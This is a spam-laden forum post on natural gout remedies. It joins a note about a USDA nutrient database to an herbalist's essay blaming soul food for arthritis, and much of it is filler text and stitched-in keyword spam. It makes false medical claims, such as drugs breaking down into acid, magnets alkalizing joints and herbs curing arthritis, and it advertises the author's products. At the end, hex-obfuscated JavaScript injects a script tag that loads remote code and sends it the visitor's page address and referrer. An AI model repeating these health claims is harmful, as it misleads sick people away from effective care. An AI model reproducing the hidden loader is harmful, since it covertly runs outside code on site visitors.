Learn more about gout home cures

You are not connected. Please login or register

Lower Uric Acid and Natural Gout Treatment and Resources

Go down  Message [Page 1 of 1]

Admin

Admin

Lower Uric Acid

So much of natural gout treatment requires diet and every gout sufferer has to pay very close attention to what they eat and drink. Imagine how useful a nutrition database on your home computer is; one that you can quickly access, without going to the Internet or 500 page reference books, to look up the nutrients in foods and beverages. And suppose that this comprehensive database is free and easily downloaded? Too good to be true?

• Not in this case.
  • The USDA National Nutrient database for Windows, Standard Reference, Release SR20 is free and it's easily downloaded.
  • It comes courtesy of the U.S.
  • Dept. of Agriculture and HeatheTech Inc.
  • This can also be done for alkalizing minerals such as calcium, magnesium, potassium and zinc.
  • And for important antioxidants that gout sufferers need such as Vitamin C, Vitamin E, Selenium and Beta Carotene.
  • With people wanting to learn more about Gout, it has provided the necessary incentive for us to write this interesting article on Gout!

Its Site Says that There are Mac and Handheld Versions Too

So if you use a handheld computer it can be used outside your home. It can be searched online for the vitamin, mineral, water, ash, protein, calorie, carbohydrate, fats, fibre (fiber), sugars, caffeine and others, of foods and beverages. We have not actually resorted to roundabout means of getting our message on Gout Diet through to you. All the matter here is genuine and to the point.

Vitamin C Has Been Pretty Well Researched as a Natural Gout Remedy

It has been found to lower uric acid levels somewhat. In the last study about it in 2005, with 500 mg of Vitamin C daily. Vitamin C is best taken in foods. Use the National Nutrient database to find the natural Vitamin C content of foods Wink

To Download Visit

***** Scroll down to where the text says "download the database for use on your computer with various software packages." Click on this. On the next page that arrives click on pcs20 exe to download it. There is also an 11 page downloadable guide in Adobe Reader which explains how to download, and how to use the database. Click on "user's guide." It is the normal style of writers to add additional information with the intention of lengthening the length of an article. However, we have provided a short and concise article with only required information on Gout Treatment. Rolling Eyes

PURINE TABLES

Over-producers of uric acid (as opposed to under-excretors) may benefit from a low purine gout diet since restricting purines in foods probably means less available to be converted into uric acid. Do you want the purines contents of foods and drinks? Visit ***** We were rather indecisive on where to stop in our writings of Purines. We just went on writing and writing to give a long article.

PH of FOODS NUMBERS

Alkalizing your body (raising its pH levels above pH is an important part of natural gout treatment because the pH theory is that a more alkaline body make uric acid more soluble and better absorbs nutrients in foods. One way to improve your body's pH levels is to ensure adequate levels of potassium, calcium, magnesium and zinc. All are important in alkalization but more calcium may be the most since if your body is acidic (low pH levels below pH it may be scavenging calcium from your bones. Why? Blood pH must be at pH The body will ensure that it is, even if it has to loot calcium elsewhere to do it. All these minerals amounts in foods and beverage are shown in the National Nutrient database.

• The carbohydrate, protein and fats amount in foods can be easily found in the National Nutrient database.
  • For this diet you also need to distinguish between mono and poly unsaturated fats and saturated fats.
  • The amounts of these in foods are easily discovered in the database Rolling Eyes

Lower Uric Acid and Natural Gout Treatment and Resources Gout987

Earlier articles I have written about the success a South African study of the use of three Zone diet rules had in lowering uric acid and against gout attacks in 13 male gout patients. Essentially, at the practical, do-it-yourself level, the Zone diet involves discovering your ideal amount of carbohydrates, protein and fats, and then implementing these amounts in your diet. How to discover and implement them are in the book "Entering the Zone" (aka the Zone diet) with additional tips and techniques in follow-up book "Mastering the Zone," both written by Barry Sears PhD. So too are many of the necessary values in foods. But the values tables in the books do not cover as many foods and beverages as does this "Titanic of nutrition" database. People are inclined to think that some matter found here that is pertaining to Purines Foods is false. However, rest is assured, all that is written here is true! Very Happy.

You can even discover how cooking, canning and freezing various foods affects the Vitamin C content of them. (It usually falls). Not only can you look up each food you are interested via the database but you can also at this site look up lists (called reports) sorted from highest to lowest and download those lists to your home or office computer. For some investigations, it's a great time saver. These reports require Adobe Reader. Wink

Which Foods are Acidic and Which are Alkaline? Visit *****

To download pH potential of foods tables. The value of this composition is achieved if after reading it, your knowledge on Free Gout Diet is greatly influenced. This is how we find out that the meaning of Free Gout Diet has really entered you! Laughing

Arthritis by Djehuty Ma'at-Ra

The first Western disease I was ever familiar with as a little boy was arthritis. My beloved paternal grandmother, Bertha Cooper, suffered from this pathology for many years. She had it very bad in her wrists and joints. I remember her asking me if I would go to the corner liquor store on the corner of 101st Street and Avalon Boulevard in Watts, California, and buy her some Ben Gay, a white pharmaceutical anti-inflammatory rubbing cream. She would rub Ben Gay on her wrists and joints and her tendons as well.

• As a little boy, I didn't understand disease.
  • I didn't know how my grandmother developed arthritis.
  • All I knew is that she had it (and claimed it too). Smile

Grandma Sis was lucky, eventually dying from degeneracy (that doctors call natural death). However, her sons (and daughter-in-laws, nephews, nieces, and grandchildren) were not so lucky, dying from the insidious cancer, including my father from lung cancer in 1994 and my mother from pancreatic cancer in.

As much as I loved soul food and my relative's cooking back in my death (Negro) days, you couldn't put a gun to my head and compel me to eat a piece of chicken or pork today, and I mean that! I love myself too much to harm my temple of God. My children are beautiful (and highly astute and precocious) because of what their parents ate before and while conceiving them. You can do it too!

• Make the change people!
  • Taste is not the criterion for what is healthy.
  • Nutritional content is!
  • Peace and love, readership!
  • This article was compliments of www.DHERBS.com and Djehuty Ma'at-Ra, the People's Herbalist!
  • Can't forget about magnet therapy as well for arthritis.
  • Magnets make a problem or injured area alkaline and also enhances circulation to the problem area so that healing can begin.
  • This article will help you since it is a comprehensive study on Gout

Man, Life is So Wonderful When You Know How to Heal and Prevent Disease

The understanding of diseases is just as important. Sometimes I'm full of grief and sorrow from my knowledge and knowing that people suffer from a lack of knowledge (and insanity too). See Ecclesiastes 1:18 and Hosea 4:6 Isn't it wonderful that we can now access information about anything, including Uric Acid form the Internet without the hassle of going through books and magazines for matter!

• My good friend and brother, Mark Lomax, a musician, healed himself from serious bouts of gout, another acid condition.
  • It's been a few years now since he had gout.
  • What did he do?
  • First, he detoxified his body on our Full Body Detox.
  • Then, he did a daily regimen of our Electric Greens Cell Food (pure alkalinity), Joints Formula and Black Cherry Juice Concentrate.
  • You wouldn't recognize this brother if you knew him 3 years ago.
  • He also lost more than 70 lbs on these herbs.
  • This man is a walking example of healing!
  • Coordinating matter regarding to Gout took a lot of time.
  • However, with the progress of time, we not only gathered more matter, we also learnt more about Gout.

Now, I don't want you thinking soul food is the cause of arthritis, because a lot of white folks, Mexicans/Latinos, and Asians also suffer from arthritis. Like soul food, the Standard American Diet will also cause arthritis. Arthritis is an American disease! The more you read about Uric Acid, the more you get to understand the meaning of it. So if you read this article and other related articles, you are sure to get the required amount of matter for yourself.

You See, Arthritis is a Condition of Inflammation of the Joints

That's all it is. The Latin word "Arth" means "joints," and the English suffix, "it is" means "inflammation." What is inflammation? A burning! What causes this burning or inflammation? ACID!!! Plain and simple! When doing an assignment on Uric Acid, it is always better to look up and use matter like the one given here. Your assignment turns out to be more interesting and colorful this way.

• She didn't smoke cigarettes like her five sons, but she would roll up her own smokes with Prince Albert brand tobacco and Zig Zag paper.
  • My childhood friends thought my grandmother smoked marijuana.
  • It was a little embarrassing until they found out what it was she was really smoking.

You Understand Arthritis, You Should Understand Tendonitis and Gout

They are acidic fluid build up problems in the joints that cause inflammation (pain). Learning about things is what we are living here for now. So try to get to know as much about everything, including Gout whenever possible.

However, when the Universe bestowed its Akashic Records of health knowledge upon me in the late 1990s, I finally understood why Grandma Sis (Bertha) developed and suffered from arthritis. You see, my grandmother was originally from the South, Mississippi to be exact. The ideal dinner was "soul food." My grandmother was an excellent cook and I never tasted any food back in my deaf, dumb, and blind days and years that tasted better than my paternal grandmother's food/cooking. However, while this so-called food, soul food, tasted good, I now understand that taste is not the criterion or measuring stick for what is healthy or nutritional. It was Grandma's good tasting soul food that did her in with arthritis and tendonitis. Yes, all that cornbread, collard and mustard greens, salt pork, candied yams, fried chicken, liver, catfish, pork chops, rock Cornish hen, neck bones, ham, white rice, etc. eventually did her (and the rest of my family members) in. Not to mention eating all that white, refined Webber's and Wonder bread, flap jacks (pancakes), syrup and biscuits, bacon, sausages, jelly cake, jelly sandwiches, saltine crackers, Vienna sausages, potted meat, Spam, hog's head cheese, liverwurst, etc. And what about all that hot cocoa, coffee (laced with white sugar and dairy cream), butter milk, pet milk, Kool-Aid, and soda pop that she drunk? People always think that they know everything about everything; however, it should be known that no one is perfect in everything. There is never a limit to learning; even learning about Gout.

Soaking inflamed body parts in hot water and essential oils of Peppermint and Eucalyptus is also beneficial for arthritis. But most importantly in fighting arthritis is modified diet. Cut out or cut down on meat and dairy products. These are two of the biggest culprits in causing arthritis. A vegetable cocktail consisting of celery, parsley, apple and/or carrot (for sweetness and base) 3-4 times weekly will greatly remove acid buildup in the joints. By all means, avoid all acidic beverages (beer, soda pop, milk, orange juice, wine, coffee, etc.). The best way of gaining knowledge about Uric Acid is by reading as much about it as possible. This can be best done through the Internet.

You can Rub this Salve Directly on Your Joints or Other Problems Area

It is very soothing and healing. And of course, as an herbalist, I have formulated my own Joint Formula that consists of all the herbs mentioned above that is a powerful little formula that works wonders for me when my wrists start to hurt from excessive typing (typing up all that legal pleading).

However, Other Certain Herbs Work Synergistically With the Herbs Supra

Personally, no healing from arthritis can take place efficiently without the following herbs: Devil's Claw, Boswellia (Frankincense), Uva Ursi, Mullein leaves, Saffron, Cayenne pepper, Feverfew, and Guaiac wood. Opportunity knocks once. So when we got the opportunity to write on Gout, we did not let the opportunity slip from our hands, and got down to writing on Gout.

One of the greatest contributors of arthritis is collard and mustard greens. Sorry Black folks, Negroes, and soul food lovers! But this is true! Greens are laced with "oxalic" acid and this oxalic acid is greatly produced when you cook the greens. This is true! And for you rat feces-laced chocolate lovers out there, your precious chocolate also contains oxalic acid.

The Smoking Also Created an Over Acid Condition in My Grandmother as Well

She also had bouts with gout, which is nothing but arthritis in the ankle area. Never be reluctant to admit that you don't know. There is no one who knows everything. So if you don't know much about Gout, all that has to be done is to read up on it!

My family could not, would not, and to this very day, still will not believe that what they put into their mouths cause their pathologies and eventually kills them. It was easy to write me off when I was a Muslim and member of the Nation of Islam in the early 1990s, simply saying "that boy is mad at white folks and the world!" But today as a Naturist, what's their excuse? Nothing but ignorance and traditional paralysis! Soul food is a tradition, Djehuty! Yes, a tradition that leads to an early grave! Smile

Organic sulfur, commonly called MSM Sulfur, is also great in healing arthritis. So is Noni juice! You can make your own healing salve as well from a base butter or oil such as shea or cocoa butter, coconut, olive, or almond oil (or any other good oil) and add in a few drops (10-15 drops) of the following essential oils: Peppermint, Clove, Wintergreen, Eucalyptus, Birch, and/or Spearmint.

However, the children of the future, including my son, Asim, and daughter, Layla, and other Conscious Minds offspring - Nadya, Najee, Elijah, Asar, Sunshine and the newest edition from Melia and Obea, and the others (out here on the West Coast in Los Angeles) will all benefit from this profound aib college of business diet as well as from my suffering and grief, as well as their parents. I'm also quite sure that many children around the nation will also benefit from their parents' reading and applying this health information and knowledge that is freely distributed. Very Happy.

• Devil's Claw, Boswellia, Uva Ursi, and Mullein are the paramount arthritis herbs.
  • They greatly counteract mucus, which is the byproduct of acid, which causes inflammation.

Mentioned all of the above to let you all know that my grandmother's arthritis was caused by what she ate and drank on a daily basis through ignorance, tradition, and habit.

MSM Sulfur- ***** id=73

• Should also mention the importance of pineapple enzymes called Bromelain for the healing of arthritis and other acid conditions.
  • Bromelain or pineapple enzymes are anti-inflammatory in nature and effect and therefore provide healing for arthritis.
  • They taste just like candy and are chewable and you can chew as much as you like, although 3-6 tablets after dinner ought to get the job done.
  • You can find Bromelain at most good health food stores.
  • Variety is the spice of life.
  • So we have added as much variety as possible to this matter on Gout to make it's reading relevant, and interesting!

Mother Nature has provided healing for arthritis and other inflammatory diseases. To heal from arthritis, all one needs to consume is certain herbs. Herbs that are anti-inflammatory in nature are the best to heal from arthritis. These herbs include Meadowsweet, Peppermint, Wintergreen, Birch, White and Black Willow Bark and Balm of Gilead.

Most modern day suffers of arthritis (and tendonitis and gout) are fighting the symptoms of these inflammatory diseases with pharmaceutical grade drugs. Even though God instructed Bible believers to heal themselves with herbs (Revelations 22:2, Ezekiel 47:12, and Pslams 104: , in their strange obedience to God, they take the enemy's pharmaceutical drugs athena pheromone 10x arthritis. Why and how? Because pharmaceutical grade drugs, though made from alkaloids, eventually break down into ACID (especially ascetic acid, which eats your red blood cells up) in the body, and acid produces inflammation, so how intelligent is it to take something to target the symptom which eventually lengthens and worsen the initial condition? Every cloud has a silver lining; so consider that this article on Uric Acid to be the silver lining to the clouds of articles on Uric Acid. It is this article that will add more spice to the meaning of Uric Acid.

var c2="gout";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

https://murrayv.forumotion.com

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum